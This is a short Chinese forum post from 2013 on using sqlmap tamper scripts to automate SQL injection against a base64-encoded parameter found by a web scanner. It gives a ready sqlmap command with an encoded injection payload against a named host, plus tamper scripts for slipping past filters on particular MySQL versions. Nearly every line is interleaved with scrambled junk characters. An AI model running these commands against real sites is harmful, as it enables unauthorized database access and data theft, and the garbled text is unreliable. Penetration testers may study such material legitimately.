WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?6 h6 J7 i# b2 b; |, x1 ^) B
4 T" f4 ?! q: g% t/ y$ D2 z/ m7 [! D
sqlmap的tamper里有个base64encode.py8 ]0 z# R% D$ {+ u% M6 O) i( J
" o9 c6 m9 K- Y: @6 M9 B使用如下' B3 ^- Z2 Z9 v" G
{. g5 y" B: s5 i% u/ E8 J6 \4 s! s0 Jsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs5 l" {5 M* h6 C, |& q
6 N6 Z. s+ x8 [0 i* D% Q
$ g% e1 c. O6 \) N2 Msqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”6 u! \) S" p* T* x
& @/ V0 u# K- k w9 m其中常用到的bypass脚本绕过SQLMAP主要两个脚本:& n5 A6 }2 U* k0 X- p
. f+ F$ c2 |" H: m. |
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
2 T5 g1 l3 k, Z+ u- H! \) q% w1 xspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
0 |& y0 y ~5 D' Y2 [9 V首先确定目标数据库版本,然后选择相应的脚本。
* `' G ]! U/ M, W% b2 K4 [+ h-v 3 --batch --tamper "space2hash.py", s7 p8 }, S' ]4 B
) k& ~3 L/ Z% N3 o. c0 n还有其他一些插件:
. B3 U+ r2 d/ c+ Q& Pencodes编码 ——charencode.py
2 r' b- H0 b: N" @6 u7 ?% N0 m: Ubase64编码 —— base64encode.py
7 u! W7 `, F8 R# ~4 k替换空格和关键字 —— halfversionedmorekeywords.py2 ~; N* S; t3 z4 L" v
|
+ ~( d( g+ p! t6 w$ z' J/ y+ B T1 A" H: \" h) H
/ _0 L0 K2 _4 i/ l3 L
- ~: d0 w* R/ a( T- B |
发表于 2013-11-23 15:50:45
收藏
支持
反对